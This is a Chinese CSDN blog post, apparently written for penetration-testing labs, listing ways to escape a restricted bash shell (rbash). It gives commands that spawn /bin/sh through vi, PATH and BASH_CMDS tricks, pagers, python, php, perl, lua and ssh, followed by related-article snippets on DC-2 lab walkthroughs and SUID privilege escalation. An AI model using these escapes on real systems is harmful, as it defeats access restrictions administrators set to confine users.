Rbash绕过

最新推荐文章于 2024-04-03 16:14:32 发布

道长在此

最新推荐文章于 2024-04-03 16:14:32 发布

阅读量558

点赞数

分类专栏： shell 文章标签：网络安全

本文链接：https://blog.csdn.net/weixin_54252904/article/details/115801069

版权

shell 专栏收录该内容

3 篇文章 0 订阅

订阅专栏

Rbash

VI绕过

vi：set shell=/bin/sh
运行shell:shell
export PATH=/usr/sbin:/usr/bin:/sbin:/bin

CP绕过

cp

环境变量绕过

BASH_CMDS[a]=/bin/sh;a  注：把/bin/bash给a变量`
export PATH=$PATH:/bin/    注：将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin   注：将/usr/bin作为PATH环境变量导出

常见绕过

利用系统常见应用逃逸
ftp
more
less
man
vi
vim

ed以上在输入的地方输入!/bin/sh 或 !/bin/bash

python

python -c 'import os; os.system("/bin/sh")'

php

php -a then exec("sh -i");

perl

perl -e 'exec "/bin/sh";'

lua

os.execute('/bin/sh')

ssh

ssh username@IP - t “/bin/sh” or “/bin/bash”

ssh username@IP -t “bash --noprofile”

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

道长在此

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

jhdecfjedeihedkdejfoeasdsj:5rbash..msa

04-28

标题 "jhdecfjedeihedkdejfoeasdsj:5rbash..msa" 和描述 "jhdecfjedeihedkdejfoeasdsj 5rbash..msa" 看起来像是随机生成的字符串，并没有提供明显的IT知识主题。不过，考虑到提供的标签是"JavaScript"，我们可以推测...

rbash限制以及绕过

qq_60848021的博客

04-09

884

rbash,即受限制的 bash,其可以用作中转服务器（实际上rbash只是bash的一个软链接）。它与一般shell的区别在于会限制一些行为，让一些命令无法执行。

参与评论您还未登录，请先登录后发表或查看评论

rbash绕过

weixin_43705814的博客

12-29

3368

rbash绕过一、前言在进行dc-2的靶场渗透时遇到了rbash受限，查阅了大佬们写的笔记了解一下原理，做一下总结好让自己更好的理解掌握。首先我们要知道为什么要进行rbash绕过，rbash是受限的shell的一种此外还有rbash、rksh和rsh，为什么要对shell进行限制呢，有以下几个原因: 1.提高安全性，防止黑客和渗透测试人员的入侵 2.限制一些会对系统造成危害的危险命令 3.为了提高渗透测试人员的个人能力，在一些靶机上设置受限的shell让测试人员绕过拿flag 二、常见的绕过方法 2.

权限提升-Linux系统权限提升篇&Vulnhub&Rbash绕过&Docker&LXD容器&History泄漏&shell交互

最新发布

siu~

04-03

1543

1、普通用户到Linux-泄漏-History 2、普通用户到Linux-限制-Rbash绕过 3、普通用户到Linux-容器-LXD&Docker 4.Linux系统提权-web/普通用户-docker逃逸&提权&shell交互章节点： 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移

一种rbash绕过方法

a1_pha的博客

01-03

433

在DC-2靶场中用到。

rbash绕过及提权

qq_45654333的博客

09-18

451

1，复制一个bash，重命名为rbash2，设置用户tom登陆的shell为rbash3, 在tom用户下新建一个.bin目录存放可以执行的命令4, 通过软连接执行命令5, 编辑文件/home/$tom/.bashrc,添加export PATH=$HOME/.bin/.文件一定要以# .bashrc为首行.

dc-2靶机练习.pdf

01-02

详细的靶机dc-2练习过程，思路明确，条例清晰，通过修改hosts进入网站，发现flag1 ...绕过tom的rbash限制，切换到jerry用户，在主目录发现flag4 使用jerry用户通过git提权，进入root目录找到final_flag

harden.sh:Slackware强化脚本

04-12

通过modprobe禁止使用某些内核模块禁用配置外壳创建一个选项以使用受限制的外壳（ rbash ）还将其设置为新用户的默认值限制可用shell的数量（ /etc/shells ）如果安装了审核，则基于stig.rules配置基本审核注意：...

hexo网站部署到云服务器的详细步骤新手指南.pdf

09-13

/bin/rbash /usr/bin/tmux /usr/bin/screen /usr/bin/git-shell ``` 使用命令 which git-shell 判断系统是否安装了 git-shell。如果已经安装，则返回 git-shell 的安装目录，如：/usr/bin/git-shell；如果未安装则...

bash笔记-01-intro .doc

09-08

- **受限版Bash (rbash)**：提供了一个受限的Shell环境，用于限制用户执行特定命令的能力，提高安全性。 #### 三、Bash命令执行机制 - **命令执行类型**： - **可执行程序**：当执行非Bash内置命令时，Bash会...

rbash绕过方法总结（精）

墨痕诉清风的博客

05-11

904

枚举 Linux 环境 1) First we must to check for available commands like cd/ls/echo etc. 2) We must to check for operators like >,>>,<,|. 3) We need to check for available programming languages like perl,ruby,python etc. 4) Which commands we can run

linux进行rbash逃逸的方法

u013930899的博客

09-12

1200

rbash逃逸方法步骤

DC-2 靶机实战------rbash绕过、git提权、WPScan的使用

z2560088的博客

09-25

344

安装DC-2 网卡开启NAT模式开始攻击攻击机kali (192.168.160.0/24)使用wpscan、cewl、hydra、dirb、nmap等工具信息搜集 nmap -sP 192.168.160.0/24 确定DC-2 IP 192.168.160.140 扫描具体开放的端口 nmap -sV 192.168.160.140 -p- -A 得知SSH开放和http开放，访问http://192.168.160.140 发现ip重定向有问题需.

靶机DC-2练习：通过rbash绕过获取shell，使用git命令提权

7Riven's blog

12-24

1859

1.主机发现靶机IP地址：192.168.109.163 2.扫描目标服务版本 3.发现80端口，访问主页访问失败很显然，本地不解析该域名，在/etc/hosts文件中添加即可再次刷新网页单击首页左下角发现flag1：出现疑似用户名cewl,登录后找下一个flag 网页其他模块未发现有效信息，接下来扫描一下后台目录 4.工具扫描后台目...

rbash

CODER的博客

04-19

2692

1.r意味着restrict 2.使用BASH_CMDS[a]=/bin/sh;a 3. $ export PATH=$PATH:/bin/ $ export PATH=$PATH:/usr/bin 4. echo /*查看文件 5. 自己使用命令吧 https://www.cnblogs.com/xiaoxiaoleo/p/8450379.html...

CTF writeup: rbash 逃脱方法

samohyes的博客

08-03

2341

今天做了一个rbash逃脱的题目。百度了好久没找到，后来翻墙用了google才找到思路，大致的思路是这位外国友人贡献的。 https://eddy3oy.com/2017/02/28/breaking-out-of-rbash/ 好了，我来说下我的解题过程。首先，我开始尝试出来可以用echo命令，但是不知道有什么用，其实采用compgen -c就可以知道能用什么命令。那么输入 echo

rbash逃逸

leoriclee的博客

07-02

574

枚举Linux环境枚举是本文中最重要的内容。我们需要通过枚举Linux环境来考察可以绕过rbash做哪些事情。我们需要枚举： 1）首先，我们必须检查有哪些可用的命令，如cd / ls / echo等。 2）我们必须检查诸如>、>>、<、|之类的操作符。 3）我们需要检查可用的编程语言，如perl、ruby、python等。 4）我们能够以root身份运行哪些命令（sudo -l）。 5）检查具有SUID权限的文件或命令。 6）必须检查当前所用的shell，具体命令为：echo $

Linux通过第三方应用提权实战总结

zhangge3663的博客

02-20

1576

Linux提权，前提是拿到了一个低权限的账号，能上传和下载文件，主要思路有： 1、内核提权。网上各种大佬的payload很多，关键在于要能找到利用哪个exp以及具体如何利用。省力点的方法是用searchsploit或者linux-exploit-suggester.sh来查找，熟悉之后难度也不大。 2、suid提权。这里也包含了sudo这种方式，两种方法的思路都是一样的，区别在于suid针对单个程序，sudo针对某个用户。这类提权方式的主要思路是：管理员授权普通用户去执行 root 权限的操作，而不需要

linux suid提权原理,对SUID可提权Root Shell的探究

weixin_35455135的博客

05-13

317

SUID是Linux的一种权限机制，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限，那么就可以利用系统中的二进制文件和工具来进行root提权。已知的可以用来提权的Linux可执行文件有：ØNmapØVimØfindØBashØMoreØLessØNanoØcp下面的命令可以发现所有的系统中运行的SUID可执行文件find / -user root -per...

linux限制用户可用命令,如何使用rbash限制用户访问Linux系统指定命令互联网技术圈互联网技术圈...

06-01

可以使用 rbash（restricted bash）来限制用户访问 Linux 系统指定命令。rbash 是一种受限制的 bash shell，它会限制用户的操作，例如禁止用户更改环境变量、禁止用户使用 cd 命令切换目录、禁止用户使用一些危险命令等。以下是使用 rbash 限制用户访问 Linux 系统指定命令的步骤： 1. 创建一个用户，例如 user1。 2. 将用户的登录 shell 修改为 rbash。可以使用以下命令修改登录 shell： ``` sudo chsh -s /bin/rbash user1 ``` 3. 创建一个目录，例如 ~/bin，用于存放用户可以访问的命令。 4. 将需要允许用户访问的命令复制到该目录中，例如命令 ls 和 cat。可以使用以下命令复制命令： ``` sudo cp /bin/ls /home/user1/bin/ sudo cp /bin/cat /home/user1/bin/ ``` 5. 将目录 ~/bin 添加到用户的 PATH 环境变量中。可以使用以下命令添加： ``` echo "export PATH=$HOME/bin:$PATH" >> ~/.bashrc ``` 6. 禁止用户使用其他命令。可以使用以下命令将不允许用户使用的命令重命名： ``` sudo mv /bin/rm /bin/rm.bak sudo mv /bin/mv /bin/mv.bak sudo mv /bin/cp /bin/cp.bak ``` 这样，用户就只能访问 ~/bin 目录中的命令，而无法访问其他命令了。需要注意的是，这种限制方式并不是绝对安全的，因为用户仍然可以使用一些 trick 来绕过限制。但是，对于一般的用户来说，这种限制方式已经足够了。